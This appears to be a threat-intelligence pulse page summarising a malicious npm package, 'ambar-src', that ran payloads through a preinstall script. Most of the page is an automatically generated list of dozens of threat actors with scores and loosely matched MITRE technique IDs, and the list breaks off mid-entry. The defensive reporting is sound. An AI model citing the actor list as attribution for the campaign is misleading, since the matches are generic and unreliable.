Trusted Design

New malicious npm package 'ambar-src' targets developers with open source malware

概要

A malicious npm package named "ambar-src" reached 50,000 downloads in days before being removed from the registry. It uses a preinstall script to execute malicious code during installation, targeting Windows, Linux, and macOS systems. The package employs detection evasion techniques and deploys powerful open-source malware variants. It abuses npm's preinstall script hook to trigger the payload without explicit invocation. The malware fetches additional payloads from remote servers and uses Yandex Cloud for command and control. Affected systems should be considered fully compromised, requiring immediate incident response actions. The attack highlights the speed at which supply chain risks can propagate and confirms that npm install is a high-risk action.

Created: 2026-02-27

Indicators

類似Pulses

類似するPulseは見つかりませんでした。

このPulseに関連する脅威アクター (事実ベース)

Mustang Panda

Score: 59.61
Matched TTPs:
  • T1003 - OS Credential Dumping
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1089 - Disabling Security Tools
  • T1091 - Replication Through Removable Media
  • T1136.001 - Local Account
  • T1590.006 - Network Security Appliances
  • T1593.002 - Search Engines
  • T1055.013 - Process Doppelgänging
  • T1218.012 - Verclsid
  • T1569.001 - Launchctl
  • T1608 - Stage Capabilities
  • T1608.005 - Link Target
  • T1087.004 - Cloud Account
  • T1102.003 - One-Way Communication
  • T1169 - Sudo
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1070.009 - Clear Persistence
  • T1159 - Launch Agent
  • T1055.005 - Thread Local Storage
MITREへのリンク →

Winnti Group

Score: 3.29
Matched TTPs:
  • T1499.001 - OS Exhaustion Flood
MITREへのリンク →

APT41

Score: 59.95
Matched TTPs:
  • T1499.001 - OS Exhaustion Flood
  • T1584.008 - Network Devices
  • T1089 - Disabling Security Tools
  • T1140 - Deobfuscate/Decode Files or Information
  • T1684 - Social Engineering
  • T1562.004 - Disable or Modify System Firewall
  • T1562.012 - Disable or Modify Linux Audit System
  • T1552.004 - Private Keys
  • T1590.006 - Network Security Appliances
  • T1177 - LSASS Driver
  • T1045 - Software Packing
  • T1588.001 - Malware
  • T1199 - Trusted Relationship
  • T1048 - Exfiltration Over Alternative Protocol
  • T1027 - Obfuscated Files or Information
  • T1573 - Encrypted Channel
  • T1218.010 - Regsvr32
  • T1002 - Data Compressed
  • T1564.003 - Hidden Window
  • T1070.009 - Clear Persistence
  • T1537 - Transfer Data to Cloud Account
  • T1574.002 - DLL Side-Loading
  • T1037.001 - Logon Script (Windows)
MITREへのリンク →

Rocke

Score: 29.30
Matched TTPs:
  • T1499.001 - OS Exhaustion Flood
  • T1497.001 - System Checks
  • T1036.009 - Break Process Trees
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1552.004 - Private Keys
  • T1059.013 - Container CLI/API
  • T1506 - Web Session Cookie
  • T1027.004 - Compile After Delivery
  • T1070.009 - Clear Persistence
  • T1537 - Transfer Data to Cloud Account
MITREへのリンク →

TeamTNT

Score: 42.05
Matched TTPs:
  • T1499.001 - OS Exhaustion Flood
  • T1606.002 - SAML Tokens
  • T1497.001 - System Checks
  • T1003.007 - Proc Filesystem
  • T1036.009 - Break Process Trees
  • T1091 - Replication Through Removable Media
  • T1558 - Steal or Forge Kerberos Tickets
  • T1009 - Binary Padding
  • T1562.004 - Disable or Modify System Firewall
  • T1071.003 - Mail Protocols
  • T1590.006 - Network Security Appliances
  • T1051 - Shared Webroot
  • T1506 - Web Session Cookie
  • T1070.009 - Clear Persistence
  • T1519 - Emond
  • T1537 - Transfer Data to Cloud Account
MITREへのリンク →

APT28

Score: 41.17
Matched TTPs:
  • T1499.001 - OS Exhaustion Flood
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1140 - Deobfuscate/Decode Files or Information
  • T1558 - Steal or Forge Kerberos Tickets
  • T1562.004 - Disable or Modify System Firewall
  • T1547.011 - Plist Modification
  • T1608.005 - Link Target
  • T1057 - Process Discovery
  • T1059.001 - PowerShell
  • T1199 - Trusted Relationship
  • T1592.003 - Firmware
  • T1218.010 - Regsvr32
  • T1070.009 - Clear Persistence
  • T1059.012 - Hypervisor CLI
  • T1588.003 - Code Signing Certificates
  • T1566.003 - Spearphishing via Service
MITREへのリンク →

UNC3886

Score: 53.35
Matched TTPs:
  • T1499.001 - OS Exhaustion Flood
  • T1606.002 - SAML Tokens
  • T1689 - Downgrade Attack
  • T1556.002 - Password Filter DLL
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1021.006 - Windows Remote Management
  • T1090.002 - External Proxy
  • T1136.002 - Domain Account
  • T1588.001 - Malware
  • T1546.003 - Windows Management Instrumentation Event Subscription
  • T1488 - Disk Content Wipe
  • T1218.010 - Regsvr32
  • T1027.004 - Compile After Delivery
  • T1546.002 - Screensaver
  • T1070.009 - Clear Persistence
  • T1003.006 - DCSync
MITREへのリンク →

Daggerfly

Score: 12.31
Matched TTPs:
  • T1584.008 - Network Devices
  • T1089 - Disabling Security Tools
  • T1573 - Encrypted Channel
  • T1174 - Password Filter DLL
  • T1059.012 - Hypervisor CLI
MITREへのリンク →

GALLIUM

Score: 18.17
Matched TTPs:
  • T1584.008 - Network Devices
  • T1089 - Disabling Security Tools
  • T1140 - Deobfuscate/Decode Files or Information
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1087.004 - Cloud Account
  • T1199 - Trusted Relationship
  • T1174 - Password Filter DLL
  • T1537 - Transfer Data to Cloud Account
MITREへのリンク →

APT29

Score: 35.51
Matched TTPs:
  • T1584.008 - Network Devices
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1140 - Deobfuscate/Decode Files or Information
  • T1562.004 - Disable or Modify System Firewall
  • T1547.011 - Plist Modification
  • T1177 - LSASS Driver
  • T1218.012 - Verclsid
  • T1218.005 - Mshta
  • T1608.005 - Link Target
  • T1199 - Trusted Relationship
  • T1683 - Generate Content
  • T1218.010 - Regsvr32
  • T1027.004 - Compile After Delivery
  • T1070.009 - Clear Persistence
  • T1537 - Transfer Data to Cloud Account
MITREへのリンク →

FIN13

Score: 19.94
Matched TTPs:
  • T1584.008 - Network Devices
  • T1606.002 - SAML Tokens
  • T1089 - Disabling Security Tools
  • T1140 - Deobfuscate/Decode Files or Information
  • T1558 - Steal or Forge Kerberos Tickets
  • T1590.006 - Network Security Appliances
  • T1588.001 - Malware
  • T1051 - Shared Webroot
  • T1199 - Trusted Relationship
  • T1569.002 - Service Execution
MITREへのリンク →

Dragonfly

Score: 33.18
Matched TTPs:
  • T1584.008 - Network Devices
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1562.004 - Disable or Modify System Firewall
  • T1590.006 - Network Security Appliances
  • T1055.013 - Process Doppelgänging
  • T1657 - Financial Theft
  • T1059.001 - PowerShell
  • T1199 - Trusted Relationship
  • T1573 - Encrypted Channel
  • T1218.010 - Regsvr32
  • T1027.004 - Compile After Delivery
  • T1070.009 - Clear Persistence
  • T1059.012 - Hypervisor CLI
MITREへのリンク →

Ke3chang

Score: 19.16
Matched TTPs:
  • T1584.008 - Network Devices
  • T1606.002 - SAML Tokens
  • T1027.008 - Stripped Payloads
  • T1003.007 - Proc Filesystem
  • T1140 - Deobfuscate/Decode Files or Information
  • T1590.006 - Network Security Appliances
  • T1055.013 - Process Doppelgänging
  • T1087.004 - Cloud Account
  • T1199 - Trusted Relationship
MITREへのリンク →

Agrius

Score: 8.22
Matched TTPs:
  • T1584.008 - Network Devices
  • T1140 - Deobfuscate/Decode Files or Information
  • T1558 - Steal or Forge Kerberos Tickets
  • T1087.004 - Cloud Account
MITREへのリンク →

APT5

Score: 15.88
Matched TTPs:
  • T1584.008 - Network Devices
  • T1027.008 - Stripped Payloads
  • T1140 - Deobfuscate/Decode Files or Information
  • T1684 - Social Engineering
  • T1546.003 - Windows Management Instrumentation Event Subscription
  • T1070.009 - Clear Persistence
MITREへのリンク →

menuPass

Score: 21.25
Matched TTPs:
  • T1584.008 - Network Devices
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1140 - Deobfuscate/Decode Files or Information
  • T1558 - Steal or Forge Kerberos Tickets
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1059.001 - PowerShell
  • T1199 - Trusted Relationship
  • T1174 - Password Filter DLL
  • T1070.009 - Clear Persistence
MITREへのリンク →

Threat Group-3390

Score: 27.38
Matched TTPs:
  • T1584.008 - Network Devices
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1091 - Replication Through Removable Media
  • T1140 - Deobfuscate/Decode Files or Information
  • T1218.003 - CMSTP
  • T1590.006 - Network Security Appliances
  • T1059.001 - PowerShell
  • T1199 - Trusted Relationship
  • T1573 - Encrypted Channel
  • T1218.010 - Regsvr32
  • T1070.009 - Clear Persistence
  • T1059.012 - Hypervisor CLI
  • T1537 - Transfer Data to Cloud Account
MITREへのリンク →

Wizard Spider

Score: 24.65
Matched TTPs:
  • T1584.008 - Network Devices
  • T1087.002 - Domain Account
  • T1684 - Social Engineering
  • T1038 - DLL Search Order Hijacking
  • T1590.006 - Network Security Appliances
  • T1588.001 - Malware
  • T1087.004 - Cloud Account
  • T1059.001 - PowerShell
  • T1199 - Trusted Relationship
  • T1506 - Web Session Cookie
  • T1601.001 - Patch System Image
  • T1070.009 - Clear Persistence
MITREへのリンク →

Ember Bear

Score: 31.55
Matched TTPs:
  • T1584.008 - Network Devices
  • T1005 - Data from Local System
  • T1140 - Deobfuscate/Decode Files or Information
  • T1558 - Steal or Forge Kerberos Tickets
  • T1562.004 - Disable or Modify System Firewall
  • T1136.002 - Domain Account
  • T1051 - Shared Webroot
  • T1059.001 - PowerShell
  • T1218.010 - Regsvr32
  • T1070.009 - Clear Persistence
  • T1519 - Emond
  • T1003.003 - NTDS
MITREへのリンク →

Sea Turtle

Score: 21.81
Matched TTPs:
  • T1499.003 - Application Exhaustion Flood
  • T1587.003 - Digital Certificates
  • T1063 - Security Software Discovery
  • T1497.001 - System Checks
  • T1140 - Deobfuscate/Decode Files or Information
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1059.013 - Container CLI/API
MITREへのリンク →

Axiom

Score: 20.02
Matched TTPs:
  • T1499.003 - Application Exhaustion Flood
  • T1140 - Deobfuscate/Decode Files or Information
  • T1177 - LSASS Driver
  • T1049 - System Network Connections Discovery
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1160 - Launch Daemon
MITREへのリンク →

HEXANE

Score: 22.83
Matched TTPs:
  • T1499.003 - Application Exhaustion Flood
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1562.012 - Disable or Modify Linux Audit System
  • T1590.006 - Network Security Appliances
  • T1055.014 - VDSO Hijacking
  • T1199 - Trusted Relationship
  • T1065 - Uncommonly Used Port
  • T1601.001 - Patch System Image
  • T1159 - Launch Agent
MITREへのリンク →

RedCurl

Score: 18.60
Matched TTPs:
  • T1587.003 - Digital Certificates
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1562.012 - Disable or Modify Linux Audit System
  • T1051 - Shared Webroot
  • T1574.010 - Services File Permissions Weakness
  • T1027.004 - Compile After Delivery
  • T1070.009 - Clear Persistence
MITREへのリンク →

APT1

Score: 10.59
Matched TTPs:
  • T1587.003 - Digital Certificates
  • T1003.007 - Proc Filesystem
  • T1590.006 - Network Security Appliances
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
MITREへのリンク →

Chimera

Score: 23.06
Matched TTPs:
  • T1587.003 - Digital Certificates
  • T1089 - Disabling Security Tools
  • T1003.007 - Proc Filesystem
  • T1590.006 - Network Security Appliances
  • T1087.004 - Cloud Account
  • T1199 - Trusted Relationship
  • T1592.003 - Firmware
  • T1059.003 - Windows Command Shell
  • T1601.001 - Patch System Image
  • T1070.009 - Clear Persistence
MITREへのリンク →

Magic Hound

Score: 48.22
Matched TTPs:
  • T1587.003 - Digital Certificates
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1036.009 - Break Process Trees
  • T1070.003 - Clear Command History
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1562.004 - Disable or Modify System Firewall
  • T1590.006 - Network Security Appliances
  • T1045 - Software Packing
  • T1588.001 - Malware
  • T1608.005 - Link Target
  • T1199 - Trusted Relationship
  • T1027 - Obfuscated Files or Information
  • T1683 - Generate Content
  • T1592.003 - Firmware
  • T1601.001 - Patch System Image
  • T1070.009 - Clear Persistence
  • T1059.012 - Hypervisor CLI
  • T1098.002 - Additional Email Delegate Permissions
MITREへのリンク →

Winter Vivern

Score: 21.33
Matched TTPs:
  • T1587.003 - Digital Certificates
  • T1140 - Deobfuscate/Decode Files or Information
  • T1558 - Steal or Forge Kerberos Tickets
  • T1562.004 - Disable or Modify System Firewall
  • T1055.013 - Process Doppelgänging
  • T1588.001 - Malware
  • T1087.004 - Cloud Account
  • T1218.001 - Compiled HTML File
  • T1059.012 - Hypervisor CLI
MITREへのリンク →

Kimsuky

Score: 59.13
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1003.007 - Proc Filesystem
  • T1091 - Replication Through Removable Media
  • T1140 - Deobfuscate/Decode Files or Information
  • T1684 - Social Engineering
  • T1009 - Binary Padding
  • T1562.012 - Disable or Modify Linux Audit System
  • T1590.006 - Network Security Appliances
  • T1588.001 - Malware
  • T1051 - Shared Webroot
  • T1218.012 - Verclsid
  • T1608 - Stage Capabilities
  • T1608.005 - Link Target
  • T1087.004 - Cloud Account
  • T1057 - Process Discovery
  • T1055.014 - VDSO Hijacking
  • T1102.003 - One-Way Communication
  • T1199 - Trusted Relationship
  • T1506 - Web Session Cookie
  • T1027.004 - Compile After Delivery
  • T1601.001 - Patch System Image
  • T1070.009 - Clear Persistence
  • T1537 - Transfer Data to Cloud Account
  • T1003.003 - NTDS
MITREへのリンク →

Moonstone Sleet

Score: 17.34
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1091 - Replication Through Removable Media
  • T1590.006 - Network Security Appliances
  • T1057 - Process Discovery
  • T1027 - Obfuscated Files or Information
  • T1573 - Encrypted Channel
MITREへのリンク →

Indrik Spider

Score: 10.27
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1003.007 - Proc Filesystem
  • T1051 - Shared Webroot
  • T1027 - Obfuscated Files or Information
MITREへのリンク →

Lazarus Group

Score: 46.47
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1070.008 - Clear Mailbox Data
  • T1009 - Binary Padding
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1588.001 - Malware
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
  • T1087.004 - Cloud Account
  • T1057 - Process Discovery
  • T1199 - Trusted Relationship
  • T1174 - Password Filter DLL
  • T1218.010 - Regsvr32
  • T1070.009 - Clear Persistence
  • T1059.012 - Hypervisor CLI
  • T1055.005 - Thread Local Storage
  • T1569.002 - Service Execution
  • T1216 - System Script Proxy Execution
MITREへのリンク →

Contagious Interview

Score: 40.84
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1558 - Steal or Forge Kerberos Tickets
  • T1021.006 - Windows Remote Management
  • T1045 - Software Packing
  • T1016 - System Network Configuration Discovery
  • T1608.005 - Link Target
  • T1087.004 - Cloud Account
  • T1102.003 - One-Way Communication
  • T1199 - Trusted Relationship
  • T1027.004 - Compile After Delivery
  • T1059.006 - Python
  • T1601.001 - Patch System Image
  • T1070.009 - Clear Persistence
  • T1221 - Template Injection
MITREへのリンク →

OilRig

Score: 39.28
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1562.009 - Safe Mode Boot
  • T1003.007 - Proc Filesystem
  • T1091 - Replication Through Removable Media
  • T1005 - Data from Local System
  • T1558 - Steal or Forge Kerberos Tickets
  • T1009 - Binary Padding
  • T1562.012 - Disable or Modify Linux Audit System
  • T1590.006 - Network Security Appliances
  • T1055.013 - Process Doppelgänging
  • T1051 - Shared Webroot
  • T1199 - Trusted Relationship
  • T1048 - Exfiltration Over Alternative Protocol
  • T1218.010 - Regsvr32
  • T1592.002 - Software
  • T1070.009 - Clear Persistence
MITREへのリンク →

LuminousMoth

Score: 14.93
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1089 - Disabling Security Tools
  • T1091 - Replication Through Removable Media
  • T1136.002 - Domain Account
  • T1584.005 - Botnet
  • T1087.004 - Cloud Account
  • T1199 - Trusted Relationship
MITREへのリンク →

Sandworm Team

Score: 49.70
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1063 - Security Software Discovery
  • T1566.002 - Spearphishing Link
  • T1091 - Replication Through Removable Media
  • T1005 - Data from Local System
  • T1140 - Deobfuscate/Decode Files or Information
  • T1558 - Steal or Forge Kerberos Tickets
  • T1562.004 - Disable or Modify System Firewall
  • T1562.012 - Disable or Modify Linux Audit System
  • T1045 - Software Packing
  • T1049 - System Network Connections Discovery
  • T1087.004 - Cloud Account
  • T1102.003 - One-Way Communication
  • T1199 - Trusted Relationship
  • T1027 - Obfuscated Files or Information
  • T1573 - Encrypted Channel
  • T1218.010 - Regsvr32
  • T1075 - Pass the Hash
  • T1601.001 - Patch System Image
  • T1070.009 - Clear Persistence
MITREへのリンク →

Salt Typhoon

Score: 14.91
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1497.001 - System Checks
  • T1140 - Deobfuscate/Decode Files or Information
  • T1608.002 - Upload Tool
  • T1009 - Binary Padding
  • T1199 - Trusted Relationship
MITREへのリンク →

Play

Score: 11.03
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1140 - Deobfuscate/Decode Files or Information
  • T1590.006 - Network Security Appliances
  • T1199 - Trusted Relationship
  • T1506 - Web Session Cookie
  • T1601.001 - Patch System Image
  • T1070.009 - Clear Persistence
MITREへのリンク →

Aoqin Dragon

Score: 9.47
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1558 - Steal or Forge Kerberos Tickets
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1537 - Transfer Data to Cloud Account
MITREへのリンク →

Moses Staff

Score: 8.23
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1590.006 - Network Security Appliances
  • T1199 - Trusted Relationship
MITREへのリンク →

Turla

Score: 34.25
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1063 - Security Software Discovery
  • T1003.007 - Proc Filesystem
  • T1684 - Social Engineering
  • T1590.006 - Network Security Appliances
  • T1045 - Software Packing
  • T1136.002 - Domain Account
  • T1608.005 - Link Target
  • T1199 - Trusted Relationship
  • T1218.001 - Compiled HTML File
  • T1506 - Web Session Cookie
  • T1027.004 - Compile After Delivery
  • T1601.001 - Patch System Image
  • T1059.012 - Hypervisor CLI
  • T1569.002 - Service Execution
MITREへのリンク →

FIN7

Score: 47.61
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1140 - Deobfuscate/Decode Files or Information
  • T1009 - Binary Padding
  • T1011.001 - Exfiltration Over Bluetooth
  • T1055.013 - Process Doppelgänging
  • T1588.001 - Malware
  • T1218.012 - Verclsid
  • T1584.005 - Botnet
  • T1608.005 - Link Target
  • T1564.002 - Hidden Users
  • T1057 - Process Discovery
  • T1059.001 - PowerShell
  • T1199 - Trusted Relationship
  • T1027 - Obfuscated Files or Information
  • T1573 - Encrypted Channel
  • T1065 - Uncommonly Used Port
  • T1601.001 - Patch System Image
MITREへのリンク →

Medusa Group

Score: 29.97
Matched TTPs:
  • T1036.008 - Masquerade File Type
  • T1140 - Deobfuscate/Decode Files or Information
  • T1218.003 - CMSTP
  • T1009 - Binary Padding
  • T1590.006 - Network Security Appliances
  • T1608.005 - Link Target
  • T1199 - Trusted Relationship
  • T1027 - Obfuscated Files or Information
  • T1506 - Web Session Cookie
  • T1601.001 - Patch System Image
  • T1070.009 - Clear Persistence
  • T1537 - Transfer Data to Cloud Account
  • T1216 - System Script Proxy Execution
MITREへのリンク →

Malteiro

Score: 4.74
Matched TTPs:
  • T1087.002 - Domain Account
  • T1562.012 - Disable or Modify Linux Audit System
  • T1506 - Web Session Cookie
MITREへのリンク →

Machete

Score: 8.18
Matched TTPs:
  • T1087.002 - Domain Account
  • T1685.002 - Disable or Modify Cloud Log
  • T1027.004 - Compile After Delivery
  • T1059.012 - Hypervisor CLI
MITREへのリンク →

Elderwood

Score: 6.10
Matched TTPs:
  • T1087.002 - Domain Account
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1537 - Transfer Data to Cloud Account
MITREへのリンク →

Transparent Tribe

Score: 4.05
Matched TTPs:
  • T1087.002 - Domain Account
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
MITREへのリンク →

RTM

Score: 4.29
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1059.012 - Hypervisor CLI
MITREへのリンク →

APT-C-36

Score: 3.73
Matched TTPs:
  • T1087.002 - Domain Account
  • T1588.001 - Malware
  • T1199 - Trusted Relationship
MITREへのリンク →

CURIUM

Score: 10.61
Matched TTPs:
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1087.004 - Cloud Account
  • T1218.001 - Compiled HTML File
  • T1059.012 - Hypervisor CLI
MITREへのリンク →

Tropic Trooper

Score: 15.13
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1590.006 - Network Security Appliances
  • T1683 - Generate Content
  • T1218.010 - Regsvr32
  • T1506 - Web Session Cookie
  • T1070.009 - Clear Persistence
  • T1159 - Launch Agent
MITREへのリンク →

Dark Caracal

Score: 8.05
Matched TTPs:
  • T1087.002 - Domain Account
  • T1048 - Exfiltration Over Alternative Protocol
  • T1059.012 - Hypervisor CLI
  • T1537 - Transfer Data to Cloud Account
MITREへのリンク →

PLATINUM

Score: 7.20
Matched TTPs:
  • T1087.002 - Domain Account
  • T1558 - Steal or Forge Kerberos Tickets
  • T1684 - Social Engineering
  • T1059.012 - Hypervisor CLI
MITREへのリンク →

TA551

Score: 7.18
Matched TTPs:
  • T1087.002 - Domain Account
  • T1558 - Steal or Forge Kerberos Tickets
  • T1218.012 - Verclsid
  • T1601.001 - Patch System Image
MITREへのリンク →

FIN8

Score: 13.66
Matched TTPs:
  • T1087.002 - Domain Account
  • T1027.017 - SVG Smuggling
  • T1199 - Trusted Relationship
  • T1027 - Obfuscated Files or Information
  • T1506 - Web Session Cookie
  • T1601.001 - Patch System Image
  • T1070.009 - Clear Persistence
MITREへのリンク →

BITTER

Score: 10.82
Matched TTPs:
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1588.001 - Malware
  • T1199 - Trusted Relationship
  • T1683 - Generate Content
  • T1218.010 - Regsvr32
MITREへのリンク →

APT37

Score: 16.86
Matched TTPs:
  • T1087.002 - Domain Account
  • T1684 - Social Engineering
  • T1562.012 - Disable or Modify Linux Audit System
  • T1055.013 - Process Doppelgänging
  • T1218.010 - Regsvr32
  • T1027.004 - Compile After Delivery
  • T1059.012 - Hypervisor CLI
  • T1216 - System Script Proxy Execution
MITREへのリンク →

LazyScripter

Score: 13.62
Matched TTPs:
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1558 - Steal or Forge Kerberos Tickets
  • T1136.002 - Domain Account
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
  • T1601.001 - Patch System Image
MITREへのリンク →

PROMETHIUM

Score: 4.65
Matched TTPs:
  • T1087.002 - Domain Account
  • T1588.001 - Malware
  • T1059.012 - Hypervisor CLI
MITREへのリンク →

TA505

Score: 20.19
Matched TTPs:
  • T1087.002 - Domain Account
  • T1685.002 - Disable or Modify Cloud Log
  • T1091 - Replication Through Removable Media
  • T1562.012 - Disable or Modify Linux Audit System
  • T1136.002 - Domain Account
  • T1051 - Shared Webroot
  • T1199 - Trusted Relationship
  • T1027 - Obfuscated Files or Information
  • T1601.001 - Patch System Image
  • T1537 - Transfer Data to Cloud Account
MITREへのリンク →

APT39

Score: 23.41
Matched TTPs:
  • T1087.002 - Domain Account
  • T1499.002 - Service Exhaustion Flood
  • T1140 - Deobfuscate/Decode Files or Information
  • T1547.011 - Plist Modification
  • T1055.013 - Process Doppelgänging
  • T1087.004 - Cloud Account
  • T1199 - Trusted Relationship
  • T1027.004 - Compile After Delivery
  • T1070.009 - Clear Persistence
  • T1537 - Transfer Data to Cloud Account
  • T1569.002 - Service Execution
MITREへのリンク →

Star Blizzard

Score: 12.98
Matched TTPs:
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1091 - Replication Through Removable Media
  • T1657 - Financial Theft
  • T1102.003 - One-Way Communication
  • T1199 - Trusted Relationship
MITREへのリンク →

Higaisa

Score: 12.48
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1590.006 - Network Security Appliances
  • T1588.001 - Malware
  • T1087.004 - Cloud Account
  • T1218.010 - Regsvr32
  • T1569.002 - Service Execution
MITREへのリンク →

Rancor

Score: 4.07
Matched TTPs:
  • T1087.002 - Domain Account
  • T1685.002 - Disable or Modify Cloud Log
MITREへのリンク →

FIN4

Score: 4.92
Matched TTPs:
  • T1087.002 - Domain Account
  • T1574.010 - Services File Permissions Weakness
MITREへのリンク →

Cobalt Group

Score: 17.79
Matched TTPs:
  • T1087.002 - Domain Account
  • T1684 - Social Engineering
  • T1518.002 - Backup Software Discovery
  • T1199 - Trusted Relationship
  • T1573 - Encrypted Channel
  • T1218.010 - Regsvr32
  • T1506 - Web Session Cookie
  • T1601.001 - Patch System Image
  • T1070.009 - Clear Persistence
MITREへのリンク →

Storm-1811

Score: 12.44
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1558 - Steal or Forge Kerberos Tickets
  • T1199 - Trusted Relationship
  • T1027 - Obfuscated Files or Information
  • T1567.003 - Exfiltration to Text Storage Sites
MITREへのリンク →

Inception

Score: 10.27
Matched TTPs:
  • T1087.002 - Domain Account
  • T1562.012 - Disable or Modify Linux Audit System
  • T1218.012 - Verclsid
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1159 - Launch Agent
MITREへのリンク →

EXOTIC LILY

Score: 4.25
Matched TTPs:
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1218.010 - Regsvr32
MITREへのリンク →

Saint Bear

Score: 10.66
Matched TTPs:
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1055.013 - Process Doppelgänging
  • T1608.005 - Link Target
  • T1218.010 - Regsvr32
  • T1537 - Transfer Data to Cloud Account
MITREへのリンク →

FIN6

Score: 14.99
Matched TTPs:
  • T1087.002 - Domain Account
  • T1063 - Security Software Discovery
  • T1562.012 - Disable or Modify Linux Audit System
  • T1055.013 - Process Doppelgänging
  • T1588.001 - Malware
  • T1199 - Trusted Relationship
  • T1601.001 - Patch System Image
  • T1070.009 - Clear Persistence
MITREへのリンク →

Patchwork

Score: 18.34
Matched TTPs:
  • T1087.002 - Domain Account
  • T1566.002 - Spearphishing Link
  • T1089 - Disabling Security Tools
  • T1562.012 - Disable or Modify Linux Audit System
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1506 - Web Session Cookie
  • T1601.001 - Patch System Image
  • T1070.009 - Clear Persistence
  • T1059.012 - Hypervisor CLI
  • T1537 - Transfer Data to Cloud Account
MITREへのリンク →

Whitefly

Score: 5.71
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1055.013 - Process Doppelgänging
  • T1199 - Trusted Relationship
MITREへのリンク →

APT19

Score: 10.81
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1590.006 - Network Security Appliances
  • T1055.013 - Process Doppelgänging
  • T1199 - Trusted Relationship
  • T1601.001 - Patch System Image
  • T1059.012 - Hypervisor CLI
MITREへのリンク →

TA2541

Score: 16.83
Matched TTPs:
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1684 - Social Engineering
  • T1136.002 - Domain Account
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
  • T1199 - Trusted Relationship
  • T1506 - Web Session Cookie
  • T1537 - Transfer Data to Cloud Account
MITREへのリンク →

Earth Lusca

Score: 33.03
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1003.007 - Proc Filesystem
  • T1091 - Replication Through Removable Media
  • T1140 - Deobfuscate/Decode Files or Information
  • T1562.004 - Disable or Modify System Firewall
  • T1590.006 - Network Security Appliances
  • T1045 - Software Packing
  • T1136.002 - Domain Account
  • T1218.012 - Verclsid
  • T1608.005 - Link Target
  • T1059.001 - PowerShell
  • T1199 - Trusted Relationship
  • T1218.001 - Compiled HTML File
  • T1027.004 - Compile After Delivery
  • T1059.012 - Hypervisor CLI
MITREへのリンク →

SideCopy

Score: 16.57
Matched TTPs:
  • T1087.002 - Domain Account
  • T1089 - Disabling Security Tools
  • T1091 - Replication Through Removable Media
  • T1590.006 - Network Security Appliances
  • T1218.012 - Verclsid
  • T1657 - Financial Theft
  • T1506 - Web Session Cookie
  • T1159 - Launch Agent
MITREへのリンク →

Leviathan

Score: 20.99
Matched TTPs:
